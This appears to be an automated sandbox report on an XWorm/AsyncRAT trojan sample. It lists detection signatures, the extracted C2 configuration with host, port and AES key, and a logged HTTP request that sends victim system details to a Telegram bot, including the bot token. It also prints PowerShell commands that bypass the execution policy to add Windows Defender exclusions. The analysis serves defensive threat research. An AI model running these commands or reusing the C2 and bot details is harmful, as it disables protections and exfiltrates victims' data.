Windows Analysis Report
9RgE5uOJwX.exe

Overview

General Information

Sample name:	9RgE5uOJwX.exe renamed because original name is a hash value
Original sample name:	72f5f19b35b22d82d8459f5e0739c248.exe
Analysis ID:	1545317
MD5:	72f5f19b35b22d82d8459f5e0739c248
SHA1:	0218dd2b354dcfdff2a11d06b6cf57f53987e9eb
SHA256:	4571751b2b7477fded0012f46aded7c86fb93194980897418c17ac917c4d4cc1
Tags:	32AsyncRATexetrojan
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Found malware configuration

Source: 9RgE5uOJwX.exe

Malware Configuration Extractor: Xworm {"C2 url": ["vehicle-temp.gl.at.ply.gg"], "Port": "1930", "Aes key": "<!QAZxcvbnm,./>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\MicrosoftClient.exe

ReversingLabs: Detection: 81%

Multi AV Scanner detection for submitted file

Source: 9RgE5uOJwX.exe

ReversingLabs: Detection: 81%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\MicrosoftClient.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 9RgE5uOJwX.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 9RgE5uOJwX.exe	String decryptor: vehicle-temp.gl.at.ply.gg
Source: 9RgE5uOJwX.exe	String decryptor: 1930
Source: 9RgE5uOJwX.exe	String decryptor: <!QAZxcvbnm,./>
Source: 9RgE5uOJwX.exe	String decryptor: <Xwormmm>
Source: 9RgE5uOJwX.exe	String decryptor: XWorm V5.6
Source: 9RgE5uOJwX.exe	String decryptor: USB.exe
Source: 9RgE5uOJwX.exe	String decryptor: %LocalAppData%
Source: 9RgE5uOJwX.exe	String decryptor: MicrosoftClient.exe

Uses 32bit PE files

Source: 9RgE5uOJwX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2

Source: 9RgE5uOJwX.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49399 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: vehicle-temp.gl.at.ply.gg

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 9RgE5uOJwX.exe, type: SAMPLE
Source: Yara match	File source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49406 -> 147.185.221.23:1930

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=7247076886&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AC0ADF584DA274A411213%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20K2C7BZM9L%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 147.185.221.23 147.185.221.23

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: SALSGIVERUS SALSGIVERUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: vehicle-temp.gl.at.ply.gg

Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000008.00000002.2468170958.000002A71F4C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000000B.00000002.2648363844.000001867A108000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2207375824.000002008022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01E68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A7071DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2232624832.00000200F2687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000002.00000002.2232053080.00000200F2397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coiops
Source: powershell.exe, 00000002.00000002.2207375824.0000020080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2257856470.0000023A01C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2365901896.000002A706FB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2499106716.0000018600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 9RgE5uOJwX.exe, MicrosoftClient.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: 9RgE5uOJwX.exe, 00000000.00000002.3380236847.0000000003021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7754858173:AAGHhysa0geGaNnoiGNJaE5p14tWFWtQDWs/sendMessage?chat_id=72470
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2499106716.0000018600229000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2223406932.0000020090071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2310348325.0000023A11CB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2449436475.000002A717021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2611542961.0000018610070000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49399 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49399

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49399 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 9RgE5uOJwX.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Detected potential crypto function

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D6936	0_2_00007FFD343D6936
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Code function: 0_2_00007FFD343D76E2	0_2_00007FFD343D76E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3440947D	2_2_00007FFD3440947D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344084F3	2_2_00007FFD344084F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3440B9FA	2_2_00007FFD3440B9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD344025FD	2_2_00007FFD344025FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34402793	2_2_00007FFD34402793
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34405C43	2_2_00007FFD34405C43
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3440BBFB	2_2_00007FFD3440BBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34403FFA	2_2_00007FFD34403FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34405BFA	2_2_00007FFD34405BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343EB9FA	5_2_00007FFD343EB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E0E63	5_2_00007FFD343E0E63
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E5EFA	5_2_00007FFD343E5EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E9EFB	5_2_00007FFD343E9EFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343E26F5	5_2_00007FFD343E26F5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343EB7FC	5_2_00007FFD343EB7FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD343EABF2	5_2_00007FFD343EABF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343DB9FA	8_2_00007FFD343DB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343D26D3	8_2_00007FFD343D26D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_00007FFD343DBBFB	8_2_00007FFD343DBBFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343DB9FA	11_2_00007FFD343DB9FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343D26D3	11_2_00007FFD343D26D3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343D2A6D	11_2_00007FFD343D2A6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343DB7FC	11_2_00007FFD343DB7FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD343DABF2	11_2_00007FFD343DABF2
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 13_2_00007FFD34400EFA	13_2_00007FFD34400EFA
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Code function: 14_2_00007FFD343E0EFA	14_2_00007FFD343E0EFA

Sample file is different than original file name gathered from version info

Source: 9RgE5uOJwX.exe, 00000000.00000002.3411654159.0000000013049000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
Source: 9RgE5uOJwX.exe, 00000000.00000000.2129779866.0000000000D13000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe
Source: 9RgE5uOJwX.exe	Binary or memory string: OriginalFilenameUpdater.exe4 vs 9RgE5uOJwX.exe

Uses 32bit PE files

Source: 9RgE5uOJwX.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 9RgE5uOJwX.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.9RgE5uOJwX.exe.cf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3411654159.0000000013028000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.2129761465.0000000000CF2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 9RgE5uOJwX.exe, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: MicrosoftClient.exe.0.dr, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, NOL8mQQjUWb5gSG3rl5bTFKFn47tOMo4cMsaQhPOWgM911Haj72XSTVGFh.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, xEidHkjl3ZbqUKvIPhMdYvEBT.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 9RgE5uOJwX.exe, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: MicrosoftClient.exe.0.dr, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, 01DoJZbphKNMAr7F08AANghctS8eAZzwwVauCQWy.cs	Base64 encoded string: 'rOJ9EPEFgU8EeZ1Z1RbZXuQ04f+0unCduWIJ+YdW3io2VwFXy/NzZJUC3dFkSOz/'

Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.9RgE5uOJwX.exe.13029ac0.0.raw.unpack, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 9RgE5uOJwX.exe, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: MicrosoftClient.exe.0.dr, CnWmUhjCIbNhf9LAxoCrrslxDzc1x6Th0W6g3YXN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@15/19@2/2

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File created: C:\Users\user\AppData\Local\MicrosoftClient.exe

Jump to behavior

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Mutant created: \Sessions\1\BaseNamedObjects\5mzBrJAeAQUAJ7jq
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Users\user\AppData\Local\MicrosoftClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfxaurn3.kw0.ps1

Jump to behavior

Source: 9RgE5uOJwX.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 9RgE5uOJwX.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 9RgE5uOJwX.exe

ReversingLabs: Detection: 81%

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe

File read: C:\Users\user\Desktop\9RgE5uOJwX.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\9RgE5uOJwX.exe "C:\Users\user\Desktop\9RgE5uOJwX.exe"
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\MicrosoftClient.exe "C:\Users\user\AppData\Local\MicrosoftClient.exe"
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '9RgE5uOJwX.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\MicrosoftClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9RgE5uOJwX.exe	Section loaded: rsaenh.dll	Jump to behavior
